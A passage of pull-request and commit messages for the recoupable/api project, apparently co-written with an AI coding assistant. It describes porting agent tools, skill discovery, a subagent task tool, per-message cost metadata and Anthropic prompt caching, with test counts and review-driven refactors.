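Both helpers are small enough to sketch. The quoting below is the standard POSIX single-quote technique; whether the real `shellEscape` also adds the outer quotes, and how the real `toDisplayPath` treats the working directory itself, are assumptions.

```typescript
// Wrap in single quotes; each embedded ' becomes '\'' (close, escaped quote, reopen).
function shellEscapeSketch(value: string): string {
  return `'${value.replace(/'/g, `'\\''`)}'`;
}

// Show paths inside the working directory as relative; leave others absolute.
function toDisplayPathSketch(absolutePath: string, workingDirectory: string): string {
  const root = workingDirectory.replace(/\/+$/, "");
  if (absolutePath === root) return ".";
  // The trailing "/" stops "/work/app" from matching "/work/application".
  if (absolutePath.startsWith(`${root}/`)) return absolutePath.slice(root.length + 1);
  return absolutePath;
}
```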

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting
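
As a rough illustration of the "YAML subset" idea behind parseSkillFrontmatter.ts, the sketch below handles only key:value pairs, quoted strings, and booleans. The function name `parseFrontmatterSketch` and the sample keys are assumptions for illustration, not the ported code.

```typescript
// Hypothetical sketch; not the actual lib/skills/parseSkillFrontmatter.ts.
type FrontmatterValue = string | boolean;

function parseFrontmatterSketch(source: string): Record<string, FrontmatterValue> {
  const result: Record<string, FrontmatterValue> = {};
  // Frontmatter is the block between the leading "---" fences.
  const match = /^---\r?\n([\s\S]*?)\r?\n---/.exec(source);
  if (!match) return result;

  for (const line of (match[1] ?? "").split(/\r?\n/)) {
    // Split on the FIRST colon only, so values such as URLs keep their colons.
    const idx = line.indexOf(":");
    if (idx === -1) continue;
    const key = line.slice(0, idx).trim();
    const raw = line.slice(idx + 1).trim();
    if (key === "" || key.startsWith("#")) continue;

    const quoted = /^(["'])(.*)\1$/.exec(raw);
    if (quoted) {
      result[key] = quoted[2] ?? ""; // strip the surrounding quotes
    } else if (raw === "true" || raw === "false") {
      result[key] = raw === "true"; // booleans
    } else {
      result[key] = raw; // plain scalar
    }
  }
  return result;
}
```

Splitting on the first colon is what keeps a value like `https://example.com/docs` intact without a full YAML parser.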

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.
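
The load pipeline described above can be sketched as three small pure functions composed in order. The bodies below are assumptions written for illustration (only the helper names, the `$ARGUMENTS` token, and the `Skill directory: <path>` header come from this commit).

```typescript
// Hypothetical stand-ins for the helpers named above; real behavior may differ.
function extractSkillBody(content: string): string {
  // Drop a leading "---" fenced frontmatter block, if present.
  return content.replace(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/, "");
}

function injectSkillDirectory(body: string, skillDirectory: string): string {
  return `Skill directory: ${skillDirectory}\n\n${body}`;
}

function substituteArguments(body: string, args: string): string {
  // split/join avoids String.replace treating "$" sequences in args specially.
  return body.split("$ARGUMENTS").join(args);
}

function renderSkill(content: string, skillDirectory: string, args: string): string {
  return substituteArguments(
    injectSkillDirectory(extractSkillBody(content), skillDirectory),
    args,
  );
}
```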

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at ${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - ${workingDirectory}/.claude/skills/    (project, claude-style)
  - ${workingDirectory}/.agents/skills/    (project, agents-style)
  - ${HOME}/.agents/skills/                (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against `recoupable/org-rostrum-pacific-...`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked `skill({ skill: "recoup-api" })` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).
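
A minimal sketch of the two extracted helpers, matching the test cases listed above (prefer SKILL.md, fall back to skill.md, null when neither exists; trailing-slash tolerance). The synchronous `exists` predicate is an assumption made to keep the example self-contained; the real helpers presumably query the sandbox filesystem asynchronously.

```typescript
// Hypothetical signatures for illustration only.
type PathExists = (path: string) => boolean;

function findSkillFile(skillDir: string, exists: PathExists): string | null {
  // Order matters: the upper-case name wins when both files are present.
  for (const name of ["SKILL.md", "skill.md"]) {
    const candidate = `${skillDir}/${name}`;
    if (exists(candidate)) return candidate;
  }
  return null;
}

function getGlobalSkillsDirectory(home: string): string {
  // Strip trailing slashes so "/root/" and "/root" resolve to the same path.
  return `${home.replace(/\/+$/, "")}/.agents/skills`;
}
```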

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)
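
The curation above amounts to an allow-list over the parent's tool record. A sketch under that assumption (the `pickSubagentTools` name and the generic record shape are hypothetical, not the actual taskTool code):

```typescript
// Allow-list taken from the commit text: read, write, edit, grep, glob, bash.
const SUBAGENT_TOOL_NAMES = ["read", "write", "edit", "grep", "glob", "bash"] as const;

// Hypothetical helper: copies only allow-listed tools, so `task` (recursion
// guard) and the other excluded tools can never reach a subagent.
function pickSubagentTools<T>(all: Record<string, T>): Record<string, T> {
  const picked: Record<string, T> = {};
  for (const name of SUBAGENT_TOOL_NAMES) {
    const tool = all[name];
    if (tool !== undefined) picked[name] = tool;
  }
  return picked;
}
```

An allow-list fails closed: a tool added to the parent later stays out of the subagent until someone opts it in.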

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.
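
The type split can be sketched as follows. `LanguageModel` here is a local stand-in for the AI SDK type, `hydrateAgentContext` is a hypothetical name, and `getSubagentModel` is simplified to one argument; only the `Omit` shape and the `subagentModel ?? model` fallback come from the commit text.

```typescript
// Stand-in for the AI SDK's LanguageModel; only object identity matters here.
type LanguageModel = { readonly modelId: string };

interface AgentContext {
  model: LanguageModel;
  subagentModel?: LanguageModel;
  sandbox: { workingDirectory: string };
}

// JSON-safe shape that can travel through a durable workflow input.
type DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">;

// Hypothetical helper: re-attach a live model inside the step.
function hydrateAgentContext(durable: DurableAgentContext, model: LanguageModel): AgentContext {
  return { ...durable, model };
}

// The subagent inherits the parent's model unless an override is set.
function getSubagentModel(ctx: AgentContext): LanguageModel {
  return ctx.subagentModel ?? ctx.model;
}
```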

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.
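
A sketch of the "pointwise sum plus stateful factory" pattern, assuming a reduced three-field usage record. The type and function names below are illustrative; the real helpers operate on the SDK's LanguageModelUsage and also track cost.

```typescript
// Reduced, hypothetical usage record for illustration.
type UsageSketch = {
  inputTokens: number | undefined;
  outputTokens: number | undefined;
  totalTokens: number | undefined;
};

// Assumption: a count stays undefined only when BOTH sides are undefined.
function addTokenCounts(a: number | undefined, b: number | undefined): number | undefined {
  if (a === undefined && b === undefined) return undefined;
  return (a ?? 0) + (b ?? 0);
}

function addUsage(a: UsageSketch, b: UsageSketch): UsageSketch {
  return {
    inputTokens: addTokenCounts(a.inputTokens, b.inputTokens),
    outputTokens: addTokenCounts(a.outputTokens, b.outputTokens),
    totalTokens: addTokenCounts(a.totalTokens, b.totalTokens),
  };
}

// Each call returns a fresh tracker, so totals never leak between turns.
function createUsageTracker(): (step: UsageSketch) => {
  lastStepUsage: UsageSketch;
  totalMessageUsage: UsageSketch;
} {
  let total: UsageSketch | undefined;
  return (step) => {
    total = total === undefined ? step : addUsage(total, step);
    return { lastStepUsage: step, totalMessageUsage: total };
  };
}
```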

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594)

Convert taskTool.execute from `async () =>` to `async function*`,
mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple
chunks during the subagent run so the chat UI can render:

  - An initial "Subagent · 0 tools · 0 tokens" card with stable
    startedAt timestamp
  - A live `pending: {name, input}` indicator for each tool-call
  - Accumulated `usage` after each finish-step
  - A final `{final: ModelMessage[], ...}` chunk containing the full
    subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the
last assistant text part from `output.final` for inclusion in the
parent agent's context.
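
The generator shape and the transcript summarization can be sketched roughly as below. The message and chunk types are simplified stand-ins (the real tool yields usage data and a `ModelMessage[]` transcript), and `runSubagent` replays a fixed list of steps instead of driving a model.

```typescript
// Simplified, hypothetical shapes for illustration.
type SubPart = { type: "text"; text: string } | { type: "tool-call"; toolName: string };
type SubMessage = { role: "user" | "assistant"; content: SubPart[] };
type TaskChunk = {
  startedAt: number;
  toolCallCount: number;
  pending?: { name: string };
  final?: SubMessage[];
};

// Yields an initial card, one chunk per tool call, then the full transcript.
async function* runSubagent(steps: SubMessage[], startedAt: number): AsyncGenerator<TaskChunk> {
  let toolCallCount = 0;
  yield { startedAt, toolCallCount };
  for (const step of steps) {
    for (const part of step.content) {
      if (part.type === "tool-call") {
        toolCallCount += 1;
        yield { startedAt, toolCallCount, pending: { name: part.toolName } };
      }
    }
  }
  yield { startedAt, toolCallCount, final: steps };
}

// Returns the last text part of the latest assistant message that has one.
function lastAssistantText(messages: SubMessage[]): string | undefined {
  for (let i = messages.length - 1; i >= 0; i--) {
    const message = messages[i];
    if (!message || message.role !== "assistant") continue;
    for (let j = message.content.length - 1; j >= 0; j--) {
      const part = message.content[j];
      if (part && part.type === "text") return part.text;
    }
  }
  return undefined;
}
```

Because `startedAt` is passed in once and repeated on every chunk, a UI can key the card on it while the counters change.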

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps
  addLanguageModelUsage to handle undefined inputs without
  introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was
`(output) =>` from the older beta SDK era. The current SDK
(ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to
`({ output }) =>` so the function actually receives the user's
answers at runtime — was previously falling through to the generic
"User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9
askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597)

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7)

Third open-agents → api cutover bundle. The handler hardcoded
`workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set
`currentBranch`, so the agent had no environment info in its system
prompt and had to run `pwd` / `git branch` on every turn.

Production verification (today, before this fix):
  agent: "My system prompt does not contain working directory or
         branch information."

After this fix the agent receives an Environment section + Current
branch line + cloud-sandbox checkpointing block — same shape as
open-agents (sandbox.recoupable.com) emits.

Changes:
- New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles
  environment section → Current branch → cloud-sandbox checkpointing
  → custom instructions, all conditional on inputs. Mirrors
  open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts).
- New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports
  open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}`
  placeholder substitution.
- `handleChatWorkflowStream`: connect the sandbox once for both skill
  discovery AND cwd/branch reading, then thread real values into
  `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On
  connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves
  today's behavior; tools surface real errors later when they
  reconnect).
- `runAgentStep`: build the system prompt via
  `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})`
  instead of using the static `agentCustomInstructions` directly.

Scope reduced from the original "A.7+9" bundle: dropped contextLimit
plumbing because it's a client-side display concern in open-agents,
not server-side model routing (verified via grep — open-agents'
server never reads context.contextLimit either).

Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring);
full suite 3121/3121 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore(chat-workflow): drop currentBranch handling from system prompt

Per direction: branch is always `main` (the default branch) in api's
deployment topology, so the per-branch `Current branch: <name>` line
and cloud-sandbox checkpointing block don't add information today.
Strip the templating to keep the system prompt focused on what's
load-bearing (the Environment section indicating workspace-relative
paths).

- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of
  open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real
  per-session branch)
- Drop `currentBranch` from `buildAgentSystemPrompt` options +
  rendering
- Stop reading `sandbox.currentBranch` in handleChatWorkflowStream
  (the field stays on AgentContext.sandbox for type completeness;
  also consumed by createSandboxHandler unchanged)
- Remove branch-related test cases

Can be re-added later if/when meaningful per-session branches (e.g.
xx/abcdef12 generated branches) land.

Tests: 3119/3119 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call

Build failure on bf1e245 — runAgentStep was still passing
`currentBranch: input.agentContext.sandbox.currentBranch` after
buildAgentSystemPrompt's option was removed. Stripping it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): Anthropic prompt cache control (Bundle A.6) (#599)

Fourth open-agents → api cutover bundle. runAgentStep was sending the
same system prompt + tool definitions on every turn as fresh input,
even though Anthropic prompt caching can cut the price of cached input
tokens by up to 90%. Production traces showed `cacheReadTokens: 0` on every
api turn, while open-agents shows cacheRead matching cacheWrite from
the prior turn — i.e. open-agents reuses the cached prefix.

Changes (SRP — one function per file):
- `lib/agent/contextManagement/isAnthropicModel.ts` — predicate
  port of open-agents'
  `packages/agent/context-management/cache-control.ts:5`.
- `lib/agent/contextManagement/addCacheControlToTools.ts` — marks
  the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only
  conserves Anthropic's 4-breakpoint limit.
- `lib/agent/contextManagement/addCacheControlToMessages.ts` —
  marks the LAST message with `cacheControl` on every step, per
  Anthropic's "mark the final block of the final message" guidance.
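
A sketch of the "mark only the last item" idea, assuming plain objects with an optional `cacheControl` field. The shapes and type names below are illustrative; in the real code the marker is attached however the AI SDK's Anthropic provider expects it.

```typescript
// Hypothetical, simplified shapes.
type CacheControl = { type: "ephemeral" };
type ToolSketch = { description: string; cacheControl?: CacheControl };
type MessageSketch = { role: "system" | "user" | "assistant"; content: string; cacheControl?: CacheControl };

const EPHEMERAL: CacheControl = { type: "ephemeral" };

// Marks only the last tool (by insertion order), spending one cache breakpoint.
function addCacheControlToTools(tools: Record<string, ToolSketch>): Record<string, ToolSketch> {
  const names = Object.keys(tools);
  const lastName = names[names.length - 1];
  const out: Record<string, ToolSketch> = {};
  for (const name of names) {
    const def = tools[name];
    if (def === undefined) continue;
    out[name] = name === lastName ? { ...def, cacheControl: EPHEMERAL } : def;
  }
  return out;
}

// Marks only the final message; earlier messages are returned untouched.
function addCacheControlToMessages(messages: readonly MessageSketch[]): MessageSketch[] {
  return messages.map((m, i) => (i === messages.length - 1 ? { ...m, cacheControl: EPHEMERAL } : m));
}
```

Both helpers copy the marked item instead of mutating it, so the same tool record can be reused across steps.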

`runAgentStep` now:
- Wraps the tool set via `addCacheControlToTools(...)` before passing
  to streamText (static — set once per step).
- Adds a `prepareStep` callback that wraps `messages` via
  `addCacheControlToMessages(...)` on every internal model call.

Production behavior reproducer (Haiku 4.5, identical 2-turn prompt
to both backends):
  api prod (broken): turn1 cacheWrite=0 cacheRead=0 cost=$0.005952
                     turn2 cacheWrite=0 cacheRead=0 cost=$0.005959
                     → flat cost; full input billed every turn.
  open-agents prod:  turn1 cacheWrite=10966 cacheRead=0
                     turn2 cacheWrite=12    cacheRead=10966 cost drops 12x
                     → near-full prefix re-read from cache on turn 2.

After this PR, api should match open-agents' caching curve.

Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5
addCacheControlToMessages + 2 runAgentStep wiring assertions); full
suite 3138/3138 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 22, 2026
…ver bundle (#602)

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

